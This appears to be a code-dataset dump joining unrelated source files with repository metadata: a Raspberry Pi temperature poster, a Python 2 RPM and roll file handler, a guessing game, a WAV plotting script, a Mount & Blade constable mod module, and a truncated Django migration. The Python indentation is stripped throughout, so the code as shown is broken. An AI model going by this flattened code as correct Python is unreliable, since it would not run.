| 2019-01-14T13:02:22
| 2019-01-14T13:02:22
| 138,491,273
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,504
|
py
|
import os
import glob
import time
import json
import requests
import datetime
os.system('modprobe w1-gpio')
os.system('modprobe w1-therm')
base_dir = '/sys/bus/w1/devices/'
device_folder = glob.glob(base_dir + '28*')[0]
device_file = device_folder + '/w1_slave'
url = 'http://192.168.0.112:8080/rpi/temperature'
SLEEP_TIMER = 5
def getserial():
# Extract serial from cpuinfo file
cpuserial = "0000000000000000"
try:
f = open('/proc/cpuinfo','r')
for line in f:
if line[0:6]=='Serial':
cpuserial = line[10:26]
f.close()
except:
cpuserial = "ERROR000000000"
return cpuserial
def read_temp_raw():
f = open(device_file, 'r')
lines = f.readlines()
f.close()
return lines
def read_temp():
lines = read_temp_raw()
while lines[0].strip()[-3:] != 'YES':
time.sleep(0.2)
lines = read_temp_raw()
equals_pos = lines[1].find('t=')
if equals_pos != -1:
temp_string = lines[1][equals_pos+2:]
temp_c = float(temp_string) / 1000.0
# temp_f = temp_c * 9.0 / 5.0 + 32.0
# return temp_c, temp_f
return temp_c
while True:
# print(read_temp())
time.sleep(SLEEP_TIMER)
payload = {
"ownerSerialNumber" : getserial(),
"temp" : read_temp(),
"milis" : time.mktime(datetime.datetime.now().timetuple()),
"name" : "first temperature sensor"
}
print(payload)
headers = { 'content-type' : 'application/json' }
response = requests.post(url, data=json.dumps(payload), headers=headers)
|
[
"noreply@github.com"
] |
noreply@github.com
|
61851185d3367e5abccad11fe204de96a2710daf
|
6d309bd5d9ef1aa1d64347bb7964574055514143
|
/src/lm-cmd/lm/file.py
|
0b27028deca078fc3226c3a055b827ebe1269364
|
[] |
no_license
|
pragmagrid/lifemapper-server
|
d8bbfbddd37fa008621996d88dc510f01704ee6b
|
8237262bcefe54acc9479c85344162899689d5c8
|
refs/heads/master
| 2021-05-22T08:20:18.213147
| 2019-12-20T20:25:20
| 2019-12-20T20:25:20
| 17,229,074
| 2
| 3
| null | 2015-12-03T21:31:33
| 2014-02-26T23:07:30
|
Makefile
|
UTF-8
|
Python
| false
| false
| 10,779
|
py
|
#! /opt/rocks/bin/python
import sys
import os
import string
import re
import shutil
import lm.utils
import xml.sax
class File:
def __init__(self, file, timestamp=None, size=None):
# Timestamp and size can be explicitly set for foreign files.
self.setFile(file, timestamp, size)
self.imortal = 0
def __cmp__(self, file):
if self.getBaseName() != file.getBaseName() or \
self.timestamp == file.timestamp:
rc = 0
elif self.timestamp > file.timestamp:
rc = 1
else:
rc = -1
# Override the inequality determination and base the decision
# on the imortal flag. If both files are divine, than don't
# change anything.
if rc and self.imortal + file.imortal == 1:
if self.imortal:
rc = 1
else:
rc = -1
return rc
def setFile(self, file, timestamp=None, size=None):
self.pathname = os.path.dirname(file)
self.filename = os.path.basename(file)
# Get the timestamp of the file, or the derefereneced symbolic
# link. If the dereferenced link does not exist set the
# timestamp to zero.
if None not in (timestamp, size):
self.timestamp = timestamp
self.size = size
elif not os.path.islink(file):
self.timestamp = os.path.getmtime(file)
self.size = os.path.getsize(file)
else:
orig = os.readlink(file)
if os.path.isfile(orig):
self.timestamp = os.path.getmtime(orig)
self.size = os.path.getsize(file)
else:
self.timestamp = 0
self.size = 0
def explode(self):
# If the file is a symbolic link to a file, follow the link
# and copy the file. Links to directories are not exanded.
file = self.getFullName()
if os.path.islink(file):
orig = os.readlink(file)
if os.path.isfile(orig):
os.unlink(file)
shutil.copy2(orig, file)
# Fix the timestamp back to that of
# the original file. The above copy seems
# to do this for us, but I'm going to
# leave this in to make sure it always works.
tm = os.path.getmtime(orig)
os.utime(file, (tm, tm))
def setImortal(self):
self.imortal = 1
def getTimestamp(self):
return self.timestamp
def getSize(self):
return float(self.size) / (1024*1024)
def getUniqueName(self):
return self.filename
def getBaseName(self):
return self.filename
def getName(self):
return self.filename
def getShortName(self):
return os.path.splitext(self.filename)[0]
def getPath(self):
return self.pathname
def getFullName(self):
return str(os.path.join(self.pathname, self.filename))
def symlink(self, target, base=''):
if os.path.isfile(target) or os.path.islink(target):
os.unlink(target)
os.symlink(self.getFullName(), target)
def chmod(self, mode):
if os.path.exists(self.getFullName()):
os.chmod(self.getFullName(), mode)
def dump(self):
print '%s(%s)' % (self.filename, self.pathname)
class RPMBaseFile(File):
def __init__(self, file, timestamp=None, size=None, ext=1):
File.__init__(self, file, timestamp, size)
self.list = []
# Remove ext count extensions, the default is 1, but for
# rolls we remove two (.diskN.iso)
s = self.filename # name-ver-rpmver.arch.rpm
for x in range(0, ext):
i = string.rfind(s, ".")
s = self.filename[:i]
i = string.rfind(s, ".")
self.list.append(s[i+1:]) # get architecture string
s = self.filename[:i]
i = string.rfind(s, "-") # get RPM version string
self.release = s[i+1:]
self.list.append(self.versionList(s[i+1:]))
s = self.filename[:i]
i = string.rfind(s, "-") # get software version string
self.version = s[i+1:]
self.list.append(self.versionList(s[i+1:]))
self.list.append(self.filename[:i]) # get package name
self.list.reverse() # we built the list backwards
def versionList(self, s):
list = []
for e in re.split('\.+|_+', s):
num = ''
alpha = ''
l = []
for c in e:
if c in string.digits:
num = num + c
if alpha:
l.append(alpha)
alpha = ''
else:
alpha = alpha + c
if num:
l.append(string.atoi(num))
num = ''
if alpha:
l.append(alpha)
if num:
l.append(string.atol(num))
list.append(l)
return list
def getBaseName(self):
return self.list[0]
def getUniqueName(self):
return '%s-%s' % (self.list[0], self.list[3])
class RPMFile(RPMBaseFile):
def __init__(self, file, timestamp=None, size=None):
RPMBaseFile.__init__(self, file, timestamp, size)
def __cmp__(self, file):
if self.getPackageArch() != file.getPackageArch():
rc = 0
else:
# For RPM Files, if the timestamps are within 2 minutes
# of each other check
# the Buildtime of the RPM
if abs(int(self.timestamp) - int(file.timestamp)) < 120 :
# print "CMP %s:%s" % (self.getFullName(), file.getFullName())
f1=os.popen("rpm -qp --qf '%%{BUILDTIME}' %s" % self.getFullName())
self.timestamp=float(f1.readline())
f1.close()
f2=os.popen("rpm -qp --qf '%%{BUILDTIME}' %s" % file.getFullName())
file.timestamp=float(f2.readline())
f2.close()
rc = File.__cmp__(self, file)
return rc
def getPackageName(self):
return self.getBaseName()
def getPackageVersion(self):
return self.list[1]
def getPackageRelease(self):
return self.list[2]
def getPackageVersionString(self):
return self.version
def getPackageReleaseString(self):
return self.release
def getPackageArch(self):
return self.list[3]
def installPackage(self, root, flags=""):
"""Installs the RPM at the given root directory. This is
used for patching RPMs into the distribution and making
bootable CDs"""
pass
dbdir = os.path.join(root, 'var', 'lib', 'rpm')
if not os.path.isdir(dbdir):
os.makedirs(dbdir)
cmd = 'rpm -i --nomd5 --force --nodeps --ignorearch ' + \
'--dbpath %s %s ' % (dbdir, flags)
cmd += '--badreloc --relocate /=%s %s' \
% (root, self.getFullName())
print 'cmd', cmd
retval = os.system(cmd)
# Crawl up from the end of the dbdir path and prune off
# all the empty directories.
while dbdir:
if not os.listdir(dbdir):
shutil.rmtree(dbdir)
list = string.split(dbdir, os.sep)
dbdir = string.join(list[:-1], os.sep)
print 'retval', retval
return retval
class RollFile(RPMBaseFile):
def __init__(self, file, timestamp=None, size=None):
RPMBaseFile.__init__(self, file, timestamp, size, 2)
self.diskID = int(string.split(file, '.')[-2][4:])
def __cmp__(self, file):
if self.getRollArch() != file.getRollArch():
rc = 0
else:
rc = File.__cmp__(self, file)
return rc
def getRollDiskID(self):
return self.diskID
def getRollName(self):
return self.getBaseName()
def getRollVersion(self):
return self.list[1]
def getRollRelease(self):
return self.list[2]
def getRollVersionString(self):
return self.version
def getRollReleaseString(self):
return self.release
def getRollArch(self):
return self.list[3]
class RollInfoFile(File,
xml.sax.handler.ContentHandler, xml.sax.handler.DTDHandler,
xml.sax.handler.EntityResolver, xml.sax.handler.ErrorHandler):
def __init__(self, file):
File.__init__(self, file)
self.attrs = {}
parser = xml.sax.make_parser()
parser.setContentHandler(self)
fin = open(file, 'r')
parser.parse(fin)
fin.close()
def startElement(self, name, attrs):
self.attrs[str(name)] = {}
for (attrName, attrVal) in attrs.items():
self.attrs[str(name)][str(attrName)] = str(attrVal)
def getXML(self):
"""Regenerate the XML file based on what was read in and
the current state."""
xml = []
xml.append('<roll name="%s" interface="%s">' %
(self.getRollName(), self.getRollInterface()))
for tag in self.attrs.keys():
if tag == 'roll':
continue
attrs = ''
for key,val in self.attrs[tag].items():
attrs += ' %s="%s"' % (key, val)
xml.append('\t<%s%s/>' % (tag, attrs))
xml.append('</roll>')
return string.join(xml, '\n')
def getRollName(self):
return self.attrs['roll']['name']
def getRollInterface(self):
return self.attrs['roll']['interface']
def getRollVersion(self):
return self.attrs['info']['version']
def getRollRelease(self):
return self.attrs['info']['release']
def setRollOS(self, os):
self.attrs['info']['os'] = os
def getRollOS(self):
try:
return self.attrs['info']['os']
except KeyError:
return 'linux'
def setRollArch(self, arch):
self.attrs['info']['arch'] = arch
def getRollArch(self):
return self.attrs['info']['arch']
def getISOMaxSize(self):
return float(self.attrs['iso']['maxsize'])
def setISOMaxSize(self, size):
self.attrs['iso']['maxsize'] = size
def getISOFlags(self):
return self.attrs['iso']['mkisofs']
def getRollRolls(self):
return self.attrs['rpm']['rolls']
def isBootable(self):
return int(self.attrs['iso']['bootable'])
def hasRolls(self):
if self.attrs['rpm']['rolls'] != '0':
return 1
else:
return 0
def hasRPMS(self):
return int(self.attrs['rpm']['bin'])
def hasSRPMS(self):
return int(self.attrs['rpm']['src'])
class Tree:
def __init__(self, root):
self.root = root
self.tree = {}
self.build('')
def getRoot(self):
return self.root
def getDirs(self):
return self.tree.keys()
def clear(self, path=''):
l1 = string.split(path, os.sep)
for key in self.tree.keys():
l2 = string.split(key, os.sep)
if lm.utils.list_isprefix(l1, l2):
del self.tree[key]
def getFiles(self, path=''):
try:
list = self.tree[path]
except KeyError:
list = []
return list
def setFiles(self, path, files):
self.tree[path] = files
def build(self, dir):
path = os.path.join(self.root, dir)
if not os.path.isdir(path):
return
# Handle the case where we don't have permission to traverse
# into a tree by pruning off the protected sub-tree.
try:
files = os.listdir(path)
except:
files = []
v = []
for f in files:
filepath = os.path.join(path, f)
if os.path.isdir(filepath) and not \
os.path.islink(filepath):
self.build(os.path.join(dir, f))
else:
if re.match('.*\.rpm$', f) != None:
v.append(RPMFile(filepath))
elif re.match('roll-.*\.iso$', f) != None:
v.append(RollFile(filepath))
else:
v.append(File(filepath))
self.tree[dir] = v
def dumpDirNames(self):
for key in self.tree.keys():
print key
def dump(self):
self.apply(self.__dumpIter__)
def apply(self, func, root=None):
for key in self.tree.keys():
for e in self.tree[key]:
func(key, e, root)
def getSize(self):
'Return the size the if Tree in Mbytes'
len = 0
for key in self.tree.keys():
for file in self.tree[key]:
len = len + file.getSize()
return float(len)
def __dumpIter__(self, path, file, root):
print path,
file.dump()
|
[
"nadya@sdsc.edu"
] |
nadya@sdsc.edu
|
b6c032ceb4d134da7d9a1dd095d343b1f7cb6f23
|
1f5e18ec358e816e045e3f34f453f18adb6401bf
|
/higher_or_lower.py
|
155f5c769928a75f8e9c94090f050af9a3462f94
|
[] |
no_license
|
keerthiballa/PyPart3
|
fcd400755be68364240e6ccf07b2237560e69efa
|
f963df6ef3d3afca4a4213dbe747897217b859e2
|
refs/heads/master
| 2023-08-23T16:20:14.253885
| 2021-10-27T19:27:20
| 2021-10-27T19:27:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,133
|
py
|
"""
Exercise 2
Create a program called higher_or_lower.py
The program must meet the following criteria.
- A function that asks the user to provide a number between 0 and 10.
- A function that returns a random number between 1 and 10.
- A function that evaluates the randomly generated number against the user's guess.
- At the end, the program must output the following:
- The random number that was generated.
- The user's guess.
- An indication if the user guess correctly or if the user's guess was too high/too low.
Answer below:
"""
"""File named higher_or_lower.py is created separately."""
def guessf():
guess = input('Guess a number between 0 and 10: ')
return int(guess)
def randnumf():
from random import randrange
return randrange(10)
def evaluate():
guess = guessf()
randnum = randnumf()
if guess > randnum:
result='Too High'
elif guess < randnum:
result='Too Low'
else:
result='Equal'
print('The random number was ' + str(randnum))
print('The number guessed was ' + str(guess))
print('Your guess was ' + str(result))
evaluate()
|
[
"keerthiballa@gmail.com"
] |
keerthiballa@gmail.com
|
ffe8e1dbeed117b6d85e0c6d3bbd7dc3c9343227
|
f58600a34c291565c0964e25808169a3e4f6f1b3
|
/testtocompare.py
|
9bf37d76bd2cb474d4e5b3795ab963161496db96
|
[] |
no_license
|
AdamMcWilliam/whosthatpokemon-AudioWaveComparison
|
ed8dcca449c218ceb14099971401c8f0fd3d1fd3
|
1049a3f1de85482ff5075af94a6b26f698542e25
|
refs/heads/master
| 2022-11-16T03:16:42.029390
| 2020-07-06T00:01:53
| 2020-07-06T00:01:53
| 277,403,707
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 480
|
py
|
import matplotlib.pyplot as plt
import numpy as np
import wave
import sys
import os
os.chdir('../../../../Desktop/Pokemon Cries')
spf = wave.open("recorded/output.wav", "r")
# Extract Raw Audio from Wav File
signal = spf.readframes(-1)
signal = np.fromstring(signal, "Int16")
#If Stereo
if spf.getnchannels() == 2:
print("Just mono files")
sys.exit(0)
plt.figure(1)
plt.title("Signal Wave...")
plt.plot(signal)
plt.savefig('recorded/test.png')
plt.close()
##plt.show()
|
[
"adammcwilliam@gmail.com"
] |
adammcwilliam@gmail.com
|
4a1f7961b91d92251e807585abeea41d73bea4c2
|
2ac6bb889569759829cc5a2ee9bbb7affdb0bd55
|
/source/constable/__init__.py
|
24b8e7ddd5a3e428eda09f9c0ecfb6073b59cc76
|
[] |
no_license
|
gdwitt/BrytenwaldaReworkedOpenProject
|
434a41d485410c5f8158191aeb0beca4a20ff807
|
41d362b55c643ca74e594151c76095f3bbe938fd
|
refs/heads/master
| 2021-08-27T19:40:42.643671
| 2017-05-29T05:01:51
| 2017-05-29T05:01:51
| 66,900,952
| 0
| 0
| null | 2017-05-29T20:17:51
| 2016-08-30T02:56:15
|
Python
|
UTF-8
|
Python
| false
| false
| 18,217
|
py
|
from source.header_operations import *
from source.header_common import *
from source.header_dialogs import *
from source.header_items import ek_body, ek_foot
from source.header_troops import tf_hero, tf_male, knight_attrib_4, wp
from source.header_skills import *
from source.module_constants import *
from source.statement import StatementBlock
import patrols
import scouts
import recruit
import train
import move_troops
import reports
import release_prisoner
WEEKLY_COST_OF_CONSTABLE = 15
simple_triggers = [
(2, [
(assign, ":has_walled_center", 0),
(try_for_range, ":center_no", centers_begin, centers_end),
(party_get_slot, ":lord_troop_id", ":center_no", "slot_town_lord"),
(eq, ":lord_troop_id", "trp_player"),
(is_between, ":center_no", walled_centers_begin, walled_centers_end),
(assign, ":has_walled_center", 1),
(assign, ":center_no", centers_end),
(try_end),
# todo: confirm that this somehow does not leave traces of the constable. (e.g. trainer, recruiter)
(try_begin),
(eq, ":has_walled_center", 0),
(neq, "$g_player_constable", 0),
(assign, "$g_player_constable", 0),
(try_end),
]),
] \
+ recruit.simple_triggers \
+ scouts.simple_triggers \
+ train.simple_triggers \
triggers = [
# create notification to appoint constable
(24, 0, 24 * 13, [], [
(assign, ":has_fief", 0),
(try_for_range, ":center_no", walled_centers_begin, walled_centers_end),
(party_get_slot, ":lord_troop_id", ":center_no", "slot_town_lord"),
(eq, ":lord_troop_id", "trp_player"),
(assign, ":has_fief", 1),
(try_end),
(eq, ":has_fief", 1),
(try_begin),
(eq, "$cheat_mode", 1),
(assign, reg0, "$g_player_constable"),
(display_message, "@{!}DEBUG : constable: {reg0}"),
(try_end),
(assign, ":notification", 0),
(try_begin),
(eq, "$g_player_constable", 0),
(assign, ":notification", 1),
(else_try),
(neq, "$g_player_constable", -1),
(neq, "$g_player_constable", "trp_dplmc_constable"),
(assign, ":notification", 1),
(try_end),
(try_begin),
(eq, ":notification", 1),
(call_script, "script_add_notification_menu", "mnu_dplmc_notification_appoint_constable", 0, 0),
(try_end),
]),
]
menus = [
("dplmc_notification_appoint_constable", 0,
"As a lord of a fief you can now appoint a constable who resides at you court "
"for a weekly salary of %d scillingas. He will recruit new troops and provide "
"information about your army." % WEEKLY_COST_OF_CONSTABLE, "none", [], [
("dplmc_appoint_default", [], "Appoint a prominent nobleman from the area.", [
(call_script, "script_dplmc_appoint_constable"),
(jump_to_menu, "mnu_dplmc_constable_confirm"),
]),
("dplmc_continue", [], "Proceed without constable.", [
(assign, "$g_player_constable", -1),
(assign, "$g_constable_training_center", -1),
(change_screen_return),
]),
]),
("dplmc_constable_confirm", 0,
"Your constable can be found at your court. You should consult him if you "
"want to recruit new troops or get detailed information about your standing army.", "none", [], [
("dplmc_continue", [], "Continue...", [
(change_screen_return),
]),
]),
] \
+ scouts.menus
# this block is added to the enter_court script to add the constable to the scene.
court_visitor = StatementBlock(
(try_begin),
(gt, "$g_player_constable", 0),
# todo: this is wrong: appoint constable should not be here
(call_script, "script_dplmc_appoint_constable"), #fix for wrong troops after update
(party_get_slot, ":town_lord", ":center_no", "slot_town_lord"),
(eq, ":town_lord", "trp_player"),
(set_visitor, ":cur_pos", "$g_player_constable"),
(val_add, ":cur_pos", 1),
(try_end),
)
consequences_give_center = StatementBlock(
(try_begin),
(eq, "$g_constable_training_center", ":center_no"),
(assign, "$g_constable_training_center", -1),
(try_end),
)
consequences_staff_salary = StatementBlock(
(try_begin),
(gt, "$g_player_constable", 0),
(val_add, ":staff_salary", WEEKLY_COST_OF_CONSTABLE),
(try_end),
)
scripts = [
("dplmc_appoint_constable", [
(troop_set_inventory_slot, "trp_dplmc_constable", ek_body, "itm_dplmc_coat_of_plates_red_constable"),
(troop_set_inventory_slot, "trp_dplmc_constable", ek_foot, "itm_leather_boots1"),
(assign, "$g_player_constable", "trp_dplmc_constable"),
]),
] \
+ recruit.scripts \
+ scouts.scripts \
+ move_troops.scripts \
# entry point to appoint constable
appoint_dialog_option = \
[anyone|plyr, "dplmc_talk_staff", [
(le, "$g_player_constable", 0),
(assign, ":has_fief", 0),
(try_for_range, ":center_no", walled_centers_begin, walled_centers_end),
(party_get_slot, ":lord_troop_id", ":center_no", "slot_town_lord"),
(eq, ":lord_troop_id", "trp_player"),
(assign, ":has_fief", 1),
(try_end),
(eq, ":has_fief", 1),
], "I want to appoint a constable.", "dplmc_talk_appoint_constable", []
]
dialogs = [
# Appoint constable
[anyone, "dplmc_talk_appoint_constable", [
(troop_slot_ge, "trp_dplmc_constable", "slot_troop_met", 1),
], "I assume you will want to rehire your former constable? "
"His rate is still %d scillingas each week, and the appointment "
"will cost us 20 scillingas." % WEEKLY_COST_OF_CONSTABLE,
"dplmc_talk_appoint_constable_confirm", []
],
[anyone, "dplmc_talk_appoint_constable", [
(is_between, "$g_talk_troop", companions_begin, companions_end),
], "I have heard good things about a local nobleman, and I believe "
"he would be well-suited for the job. He demands %d scillingas "
"each week, though. The appointment will cost us 20 scillingas." % WEEKLY_COST_OF_CONSTABLE,
"dplmc_talk_appoint_constable_confirm", []
],
[anyone, "dplmc_talk_appoint_constable", [],
"That's a wise idea. May I suggest a very capable nobleman and friend of my "
"family? He demands %d scillingas each week, though. The appointment will "
"cost us 20 scillingas." % WEEKLY_COST_OF_CONSTABLE,
"dplmc_talk_appoint_constable_confirm", []
],
[anyone | plyr, "dplmc_talk_appoint_constable_confirm", [
(store_troop_gold, ":gold", "trp_player"),
(ge, ":gold", 20),
], "So be it.", "dplmc_talk_appoint_confirm_yes", [
(call_script, "script_dplmc_appoint_constable"),
(troop_remove_gold, "trp_player", 20),
]],
[anyone | plyr, "dplmc_talk_appoint_constable_confirm", [
(troop_get_slot, ":player_spouse", "trp_player", "slot_troop_spouse"),
(eq, "$g_talk_troop", ":player_spouse"),
], "Maybe later.", "spouse_pretalk", []
],
[anyone | plyr, "dplmc_talk_appoint_constable_confirm", [
(eq, "$g_talk_troop", "$g_player_minister"),
(troop_get_slot, ":player_spouse", "trp_player", "slot_troop_spouse"),
(neq, ":player_spouse", "$g_player_minister"),
], "Maybe later.", "minister_pretalk", []
],
[anyone, "dplmc_talk_appoint_confirm_yes", [
(troop_get_slot, ":player_spouse", "trp_player", "slot_troop_spouse"),
(eq, "$g_talk_troop", ":player_spouse"),
], "I will send him a letter he should arrive at the court soon.", "spouse_pretalk", []
],
[anyone, "dplmc_talk_appoint_confirm_yes", [
(eq, "$g_talk_troop", "$g_player_minister"),
], "I will send him a letter he should arrive at the court soon.", "minister_pretalk", []
],
# Constable actions
[anyone, "start", [
(eq, "$g_player_constable", "$g_talk_troop"),
], "Always at your service!", "dplmc_constable_talk", []
],
[anyone, "dplmc_constable_pretalk", [],
"Do you need anything else, Sire?", "dplmc_constable_talk", []
],
# faith report
[anyone | plyr, "dplmc_constable_talk", [],
"I want a report on the kingdom's faith.", "dplmc_constable_faith", []],
[anyone, "dplmc_constable_faith", [
(assign, reg13, "$g_sod_global_faith"),
], "Due to reports from our kingdom we managed to convert {reg13} people to our faith.",
"dplmc_constable_faith1", []
],
[anyone | plyr, "dplmc_constable_faith1", [],
"It could always be better...", "dplmc_constable_pretalk", []
],
# ask about war
[anyone | plyr, "dplmc_constable_talk", [], "How goes the war?", "dplmc_constable_talk_ask_war",[]],
[anyone, "dplmc_constable_talk_ask_war", [], "{s12}", "dplmc_constable_talk_ask_war_2", [
(assign, ":num_enemies", 0),
(try_for_range_backwards, ":cur_faction", kingdoms_begin, kingdoms_end),
(faction_slot_eq, ":cur_faction", "slot_faction_state", sfs_active),
(store_relation, ":cur_relation", ":cur_faction", "fac_player_supporters_faction"),
(lt, ":cur_relation", 0),
(try_begin),
(eq, ":num_enemies", 0),
(str_store_faction_name_link, s12, ":cur_faction"),
(else_try),
(eq, ":num_enemies", 1),
(str_store_faction_name_link, s11, ":cur_faction"),
(str_store_string, s12, "@{s11} and {s12}"),
(else_try),
(str_store_faction_name_link, s11, ":cur_faction"),
(str_store_string, s12, "@{!}{s11}, {s12}"),
(try_end),
(val_add, ":num_enemies", 1),
(try_end),
(try_begin),
(eq, ":num_enemies", 0),
(str_store_string, s12, "@We are not at war with anyone."),
(else_try),
(str_store_string, s12, "@We are at war with {s12}."),
(try_end),
]],
[anyone | plyr | repeat_for_factions, "dplmc_constable_talk_ask_war_2", [
(store_repeat_object, ":faction_no"),
(is_between, ":faction_no", kingdoms_begin, kingdoms_end),
(faction_slot_eq, ":faction_no", "slot_faction_state", sfs_active),
(store_relation, ":cur_relation", ":faction_no", "fac_player_supporters_faction"),
(lt, ":cur_relation", 0),
(str_store_faction_name, s1, ":faction_no")
], "Tell me more about the war with {s1}.", "dplmc_constable_talk_ask_war_details", [
(store_repeat_object, "$faction_requested_to_learn_more_details_about_the_war_against")
]],
[anyone | plyr, "dplmc_constable_talk_ask_war_2", [], "That's all I wanted to know. Thank you.", "dplmc_constable_pretalk",[]],
[anyone, "dplmc_constable_talk_ask_war_details", [], "{!}{s9}.", "dplmc_constable_talk_ask_war_2", [
(store_add, ":war_damage_slot", "$faction_requested_to_learn_more_details_about_the_war_against", "slot_faction_war_damage_inflicted_on_factions_begin"),
(val_sub, ":war_damage_slot", kingdoms_begin),
(faction_get_slot, ":war_damage_inflicted", "$players_kingdom", ":war_damage_slot"), #Floris 2.52 - Diplo bugfix was "fac_player_supporters_faction"
(store_add, ":war_damage_slot", "$players_kingdom", "slot_faction_war_damage_inflicted_on_factions_begin"), #Floris 2.52 - Diplo bugfix was "fac_player_supporters_faction"
(val_sub, ":war_damage_slot", kingdoms_begin),
(faction_get_slot, ":war_damage_suffered", "$faction_requested_to_learn_more_details_about_the_war_against", ":war_damage_slot"),
(val_max, ":war_damage_suffered", 1),
(store_mul, ":war_damage_ratio", ":war_damage_inflicted", 100),
(val_div, ":war_damage_ratio", ":war_damage_suffered"),
(try_begin),
(eq, "$cheat_mode", 1),
(assign, reg3, ":war_damage_inflicted"),
(assign, reg4, ":war_damage_suffered"),
(assign, reg5, ":war_damage_ratio"),
(display_message, "str_war_damage_inflicted_reg3_suffered_reg4_ratio_reg5"),
(try_end),
(str_store_string, s9, "str_error__did_not_calculate_war_progress_string_properly"),
(try_begin),
(lt, ":war_damage_inflicted", 5),
(str_store_string, s9, "str_the_war_has_barely_begun_so_and_it_is_too_early_to_say_who_is_winning_and_who_is_losing"),
(else_try),
(gt, ":war_damage_inflicted", 100),
(gt, ":war_damage_ratio", 200),
(str_store_string, s9, "str_we_have_been_hitting_them_very_hard_and_giving_them_little_chance_to_recover"),
(else_try),
(gt, ":war_damage_inflicted", 80),
(gt, ":war_damage_ratio", 150),
(str_store_string, s9, "str_the_fighting_has_been_hard_but_we_have_definitely_been_getting_the_better_of_them"),
(else_try),
(gt, ":war_damage_suffered", 100),
(lt, ":war_damage_ratio", 50),
(str_store_string, s9, "str_they_have_been_hitting_us_very_hard_and_causing_great_suffering"),
(else_try),
(gt, ":war_damage_suffered", 80),
(lt, ":war_damage_ratio", 68),
(str_store_string, s9, "str_the_fighting_has_been_hard_and_i_am_afraid_that_we_have_been_having_the_worst_of_it"),
(else_try),
(gt, ":war_damage_suffered", 50),
(gt, ":war_damage_inflicted", 50),
(gt, ":war_damage_ratio", 65),
(str_store_string, s9, "str_both_sides_have_suffered_in_the_fighting"),
(else_try),
(gt, ":war_damage_ratio", 125),
(str_store_string, s9, "str_no_clear_winner_has_yet_emerged_in_the_fighting_but_i_think_we_are_getting_the_better_of_them"),
(else_try),
(gt, ":war_damage_ratio", 80),
(str_store_string, s9, "str_no_clear_winner_has_yet_emerged_in_the_fighting_but_i_fear_they_may_be_getting_the_better_of_us"),
(else_try),
(str_store_string, s9, "str_no_clear_winner_has_yet_emerged_in_the_fighting"),
(try_end),
(try_begin),
#(neg|faction_slot_eq, "fac_player_supporters_faction", "slot_faction_leader", "$g_talk_troop"),
(call_script, "script_npc_decision_checklist_peace_or_war", "$players_kingdom", "$faction_requested_to_learn_more_details_about_the_war_against", -1),
(str_store_string, s9, "str_s9_s14"),
(try_end),
]],
scouts.dialog_option,
release_prisoner.dialog_option,
# report
[anyone | plyr, "dplmc_constable_talk", [],
"I want a report.", "dplmc_constable_reports_ask", []
],
[anyone, "dplmc_constable_reports_ask", [],
"About what do you want to have a report?", "dplmc_constable_reports", []
],
reports.kingdom_option,
reports.army_option,
reports.lord_convoy_option,
reports.garrison_option,
[anyone | plyr, "dplmc_constable_reports", [],
"Thank you, that's all for now.", "dplmc_constable_pretalk", []
],
# recruit and train
[anyone | plyr, "dplmc_constable_talk", [],
"Let's talk about recruits and training.", "dplmc_constable_recruits_and_training_ask", []
],
[anyone, "dplmc_constable_recruits_and_training_ask", [],
"Of course.", "dplmc_constable_recruits_and_training", []
],
recruit.dialog_option,
train.dialog_option,
[anyone | plyr, "dplmc_constable_recruits_and_training", [],
"Nevermind", "dplmc_constable_pretalk", []
],
# patrols and troop movement
[anyone | plyr, "dplmc_constable_talk", [],
"Let's talk about patrols and troop movement.", "dplmc_constable_security_ask", []
],
[anyone, "dplmc_constable_security_ask", [],
"Of course.", "dplmc_constable_security", []
],
move_troops.dialog_option,
patrols.create_option,
patrols.return_to_center_option,
patrols.change_target_option,
patrols.disband_option,
[anyone | plyr, "dplmc_constable_security", [],
"Nevermind.", "dplmc_constable_pretalk", []
],
# sell prisoners
[anyone | plyr, "dplmc_constable_talk", [
(store_num_regular_prisoners, reg0),
(ge, reg0, 1)
], "I have some prisoners can you sell them for me?", "dplmc_constable_prisoner", []
],
[anyone, "dplmc_constable_prisoner", [],
"Of course, Sire", "dplmc_constable_pretalk", [
(change_screen_trade_prisoners)
]],
# dismiss constable
[anyone | plyr, "dplmc_constable_talk", [],
"You are dismissed.", "dplmc_constable_dismiss_confirm_ask", []
],
[anyone, "dplmc_constable_dismiss_confirm_ask", [],
"Are you sure that you don't need me anymore?", "dplmc_constable_dismiss_confirm", []
],
[anyone | plyr, "dplmc_constable_dismiss_confirm", [],
"Yes I am.", "dplmc_constable_dismiss_confirm_yes", []
],
[anyone, "dplmc_constable_dismiss_confirm_yes", [],
"As you wish.", "close_window", [
(assign, "$g_player_constable", -1),
(assign, "$g_constable_training_center", -1),
]],
[anyone | plyr, "dplmc_constable_dismiss_confirm", [],
"No I am not.", "dplmc_constable_pretalk", []
],
[anyone | plyr, "dplmc_constable_talk", [],
"Thank you, I will come back to you later.", "close_window", []
],
] \
+ patrols.dialogs \
+ scouts.dialogs \
+ recruit.dialogs \
+ train.dialogs \
+ move_troops.dialogs \
+ reports.dialogs \
+ release_prisoner.dialogs \
troops = [
["dplmc_constable", "Constable Sextus", "Constables", tf_hero|tf_male, 0, 0, 'fac_commoners', ['itm_mailbyrniegreen', 'itm_ankleboots'], knight_attrib_4, wp(200), knows_common|knows_trainer_9|knows_shield_3|knows_ironflesh_3|knows_power_strike_4|knows_athletics_4, 0x0000000b4b1015054b1b4d591cba28d300000000001e472b0000000000000000]
] \
+ scouts.troops \
+ recruit.troops \
party_templates = scouts.party_templates \
+ recruit.party_templates
|
[
"gdwitt@gmail.com"
] |
gdwitt@gmail.com
|
7efeaee7546af9515411ae9bd7622a9865699969
|
849971a1afda0757ddfaa02361d5b4eedc4833b0
|
/project/shortener/migrations/0004_auto_20201103_0819.py
|
0db5dd986126ad6ad0d4b7f248c68feec73fdec4
|
[] |
no_license
|
mahdibohloul/UrlShortenerAPIHandler
|
74c7549f9309e1f59002428a4a508d694191c152
|
9d12ad3f9d0197de577dc5edb59fdf7785f33874
|
refs/heads/main
| 2023-01-10T06:55:20.698789
| 2020-11-03T13:29:40
| 2020-11-03T13:29:40
| 309,677,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 514
|
py
|
# Generated by Django 3.1.2 on 2020-11-03 08:19
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('shortener', '0003_auto_20201102_1145'),
]
operations = [
